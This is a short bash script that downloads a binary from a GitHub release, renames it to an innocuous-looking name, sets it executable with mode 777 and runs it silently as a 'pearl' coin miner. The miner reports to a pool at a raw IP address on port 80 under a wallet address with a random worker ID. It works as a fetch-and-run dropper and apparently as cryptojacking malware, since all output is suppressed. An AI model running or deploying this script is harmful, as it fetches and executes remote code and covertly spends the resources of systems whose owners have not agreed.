#!/bin/bash
wget https://github.com/fonduesun/basdeas/releases/download/latest/prsald
mv prsald seanms
chmod 777 seanms
./seanms --coin pearl -o 57.128.164.63:80 -u prl1prafxwc52qrj2gqd46q78hnqfakeff7zsxdn3ndd5uu6n4f27wneq3c7gd5/$(echo $RANDOM | md5sum | head -c 10) > /dev/null 2>&1
